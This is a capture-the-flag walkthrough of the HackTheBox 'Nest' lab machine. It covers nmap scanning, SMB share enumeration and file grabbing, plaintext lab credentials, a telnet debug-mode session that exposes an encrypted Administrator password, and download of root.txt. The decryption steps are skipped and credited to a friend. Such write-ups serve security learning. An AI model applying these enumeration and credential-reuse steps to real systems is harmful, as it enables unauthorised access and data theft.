NEST WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 10:15 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating Ping Scan at 10:15
    Scanning 10.10.10.178 [4 ports]
    Completed Ping Scan at 10:15, 0.48s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 10:15
    Completed Parallel DNS resolution of 1 host. at 10:15, 0.19s elapsed
    Initiating SYN Stealth Scan at 10:15
    Scanning 10.10.10.178 [1000 ports]
    Discovered open port 445/tcp on 10.10.10.178
    Completed SYN Stealth Scan at 10:15, 23.02s elapsed (1000 total ports)
    Initiating Service scan at 10:15
    Scanning 1 service on 10.10.10.178
    Completed Service scan at 10:15, 30.67s elapsed (1 service on 1 host)
    Initiating OS detection (try #1) against 10.10.10.178
    Retrying OS detection (try #2) against 10.10.10.178
    Initiating Traceroute at 10:16
    Completed Traceroute at 10:16, 0.71s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 10:16
    Completed Parallel DNS resolution of 2 hosts. at 10:16, 0.38s elapsed
    NSE: Script scanning 10.10.10.178.
    Initiating NSE at 10:16
    Completed NSE at 10:16, 40.08s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.66s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Nmap scan report for 10.10.10.178
    Host is up (0.48s latency).
    Not shown: 999 filtered ports
    PORT    STATE SERVICE       VERSION
    445/tcp open  microsoft-ds?
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose|phone|specialized
    Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
    OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
    Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.020 days (since Sat May 30 09:47:48 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=265 (Good luck!)
    IP ID Sequence Generation: Incremental

    Host script results:
    |_clock-skew: 4m24s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-30T04:50:32
    |_  start_date: 2020-05-30T04:23:04

    TRACEROUTE (using port 445/tcp)
    HOP RTT       ADDRESS
    1   702.63 ms 10.10.14.1
    2   703.27 ms 10.10.10.178

    NSE: Script Post-scanning.
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds
            Raw packets sent: 2100 (96.084KB) | Rcvd: 61 (4.750KB)

ENUMERATE SMB

    root@liquid:~/Desktop/HTB/nest# smbclient -L 10.10.10.178
    Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
    SMB1 disabled -- no workgroup available

RANDOM DATA CHECKING IN SMB FILES

root@liquid:~/Desktop/HTB/nest# smbclient  \\\\10.10.10.178\\Data
    smb: \> cd Shared\Templates\HR\
    smb: \Shared\Templates\HR\> ls
    .                                   D        0  Wed Aug  7 15:08:01 2019
    ..                                  D        0  Wed Aug  7 15:08:01 2019
    Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
                    10485247 blocks of size 4096. 6544122 blocks available
    smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
    Get file Welcome Email.txt? y
    getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
    smb: \Shared\Templates\HR\> cd ../../Maintenance\
    smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
    Get file Maintenance Alerts.txt? y
    getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

TempUser : welcome2019

We have so many Files Under Data Folder So rather going one by one Lets grab them at once !!

    root@liquid:~/Desktop/HTB/nest# smbget -R  smb://10.10.10.178/Data/ -U TempUser
    Password for [TempUser] connecting to //Data/10.10.10.178: 
    Using workgroup WORKGROUP, user TempUser

    smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml                              
    smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt                                   
    smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml                                 
    smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml                                            
    smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML                                      
    smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml                                   
    smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml                                  
    smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml                                
    smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml                          
    smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt                        
    smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt                             
    Downloaded 16.65kB in 81 seconds

After checking in all these files I got file!!

Data//IT/Configs/RU Scanner/RU_Config.xml

But this was in encrypted i tried to decrypt it online but nothing worked.

Then I proceeded further with Other files and got one more file named

Data//IT/Configs/NotepadPlusPlus/config.xml

So I directly I tried to open that file which we got above using TempUser And Downloaded all those files

    root@liquid:~/Desktop/HTB/nest# smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
    Password for [TempUser] connecting to //Secure$/10.10.10.178: 
    Using workgroup WORKGROUP, user TempUser
    smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt                     
    smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt                                         
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb     
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb       
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj    
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user    
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb        
    smb://10.10.10.178/Secure$/IT/Carl//VB Proj                                             
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln    
    Downloaded 25.18kB in 79 seconds

Looking at this data, we find some interesting fode in Module1.vb and Utils.vb. As far as content we are interested in, Module1.vb uses Utils.vb to decrypt the password it retrieves from the RU_config.xml configuration file.

Here I took help of My friend who had alredy completed this

C.Smith : xRxRxPANCAK3SxRxRx

Lets Get user.txt

    root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Users/C.Smith -U C.Smith
    Password for [C.Smith] connecting to //Users/10.10.10.178: 
    Using workgroup WORKGROUP, user C.Smith
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt        
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml   
    smb://10.10.10.178/Users/C.Smith/user.txt   

After looking at this password file!!

    cat Debug\ Mode\ Password.txt:Password
    WBQ201953D8w 

GETTING ROOT ACCESS

Lets Telnet Our IP to The Port we got in above files and during nmap!!

 root@liquid:~/Desktop/HTB/nest# telnet 10.10.10.178 4386
    Trying 10.10.10.178...
    Connected to 10.10.10.178.
    Escape character is '^]'.

    HQK Reporting Service V1.2

    >help

    This service allows users to run queries against databases using the legacy HQK format

    --- AVAILABLE COMMANDS ---

    LIST
    SETDIR <Directory_Name>
    RUNQUERY <Query_ID>
    DEBUG <Password>
    HELP <Command>
    >ls

    Unrecognised command
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  COMPARISONS
    [1]   Invoices (Ordered By Customer)
    [2]   Products Sold (Ordered By Customer)
    [3]   Products Sold In Last 30 Days

    Current Directory: ALL QUERIES
    >setdir 1

    Error: The specified directory does not exist
    >DEBUG WBQ201953D8w

    Debug mode enabled. Use the HELP command to view additional commands that are now available
    >setdir 1

    Error: The specified directory does not exist
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  COMPARISONS
    [1]   Invoices (Ordered By Customer)
    [2]   Products Sold (Ordered By Customer)
    [3]   Products Sold In Last 30 Days

    Current Directory: ALL QUERIES
    >setdir 2

    Error: The specified directory does not exist
    >setdir ..

    Current directory set to HQK
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  ALL QUERIES
    [DIR]  LDAP
    [DIR]  Logs
    [1]   HqkSvc.exe
    [2]   HqkSvc.InstallState
    [3]   HQK_Config.xml

    Current Directory: HQK
    >setdir LDAP

    Current directory set to LDAP
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [1]   HqkLdap.exe
    [2]   Ldap.conf

    Current Directory: LDAP
    >showquery 2

    Domain=nest.local
    Port=389
    BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
    User=Administrator
    Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Here we got Our Password for Administrator but it is also encoded
Where I took help of my friend agai
My weak part is with Debugging
We just to debug the given exe files
and we will get our password

Administrator : XtH4nkS4Pl4y1nGX

Now let’s login using Administrator

    root@liquid:~/Desktop/HTB/nest# smbclient  \\\\10.10.10.178\\C$ -U Administrator
    Enter WORKGROUP\Administrator's password: 
    Try "help" to get a list of possible commands.
    smb: \> cd Users\Administrator\Desktop\
    smb: \Users\Administrator\Desktop\> ls
    .                                  DR        0  Sun Jan 26 02:20:50 2020
    ..                                 DR        0  Sun Jan 26 02:20:50 2020
    desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
    root.txt                            A       32  Mon Aug  5 18:27:26 2019
                    10485247 blocks of size 4096. 6544088 blocks available
    smb: \Users\Administrator\Desktop\> get root.txt
    getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: